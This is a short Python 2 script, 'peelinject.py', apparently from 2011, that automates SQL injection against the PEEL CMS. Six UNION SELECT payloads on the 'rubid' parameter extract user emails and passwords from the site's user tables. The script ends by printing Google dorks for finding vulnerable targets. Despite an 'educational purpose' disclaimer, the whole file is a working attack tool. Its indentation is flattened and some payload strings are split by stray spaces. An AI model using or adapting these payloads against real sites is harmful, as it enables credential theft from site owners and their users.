CMS exploit

1. #!/usr/bin/python
2.     # This was written for educational purpose and pentest only. Use it at your own risk.
3.     # Author will be not responsible for any damage!
4.     # !!! Special greetz for my friend sinner_01 !!!
5.     # Toolname : peelinject.py
6.     # Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
7.     # Version : 0.1
8.     # greetz for d3hydr8, rsauron, low1z, qk, marezzi, StRoNiX, t0r3x and all members of ex darkc0de.com and ljuska.org
9.     # More vuln in next version
10.     # So many vuln sites to find
11.     #
12.  
13.  
14.     import sys, os, re, time, urllib2
15.  
16.     if sys.platform == 'linux' or sys.platform == 'linux2':
17.     clearing = 'clear'
18.     else:
19.     clearing = 'cls'
20.     os.system(clearing)
21.  
22.     def logo():
23.     print "\n|---------------------------------------------------------------|"
24.     print "| b4ltazar[@]gmail[dot]com |"
25.     print "| 02/2011 peelinject.py v.0.1 |"
26.     print "| |"
27.     print "|---------------------------------------------------------------|"
28.  
29.     if len(sys.argv) !=2:
30.     logo()
31.     print "\nEx: ./peelinject.py http://www.site.com/\n"
32.     sys.exit(1)
33.  
34.     vulnsql = ["lire/index.php?rubid=1+union+all+select+0,concat_ws(cha r(58),email,mot_passe,0x62616c74617a​6172),2+from+ peel_utilisateurs--", "lire/index.php?rubid=1+union+all+select+concat_ws(char( 58),email,mot_passe,0x62616c74617a61​72),1,2+from+ peel_utilisateurs--", "lire/index.php?rubid=1+and+1=2+union+all+select+concat_ ws(char(58),email,mot_passe,0x62616c​74617a6172),1 ,2,3+from+jld_utilisateurs--", "lire/index.php?rubid=1+union+all+select+0,concat_ws(cha r(58),email,mot_passe,0x62616c74617a​6172)+from+pe el_utilisateurs--", "lire/index.php?rubid=1+union+all+select+0,concat_ws(cha r(58),email,mot_passe,0x62616c74617a​6172)+from+ut ilisateurs--", "index.php?rubid=1+union+all+select+0,concat_ws(ch ar(58),email,mot_passe,0x62616c74617a​6172),2+from +peel_utilisateurs--"]
35.  
36.     site = sys.argv[1]
37.     if site[:4] != "http":
38.     site = "http://"+site
39.     if site [-1] != "/":
40.     site = site + "/"
41.  
42.     logo()
43.     print "\n[-] %s" % time.strftime("%X")
44.     print "\n[+] Target:", site
45.     print "[+]",len(vulnsql),"Vulns loaded "
46.     print "[+] Starting scan ...\n"
47.  
48.  
49.     for sql in vulnsql:
50.     print "[+] Checking:" ,site+sql.replace("\n","")
51.     try:
52.     target = urllib2.urlopen(site+sql.replace("\n", "")).read()
53.     if re.findall("baltazar", target):
54.     print"[!] w00t!,w00t!: ",site+sql.replace("\n", "")
55.     print
56.     else:
57.     print "[-] Sorry, can't exploit "
58.     print
59.     except(urllib2.HTTPError):
60.     pass
61.     except(KeyboardInterrupt, SystemExit):
62.     pass
63.  
64.     print "[!] Use this google dork for finding targets\n"
65.     print "\tinurl:lire/index.php?rubid="
66.     print "\tinurl:/index.php?rubid=\n"
67.     print "\n[-] %s" % time.strftime("%X")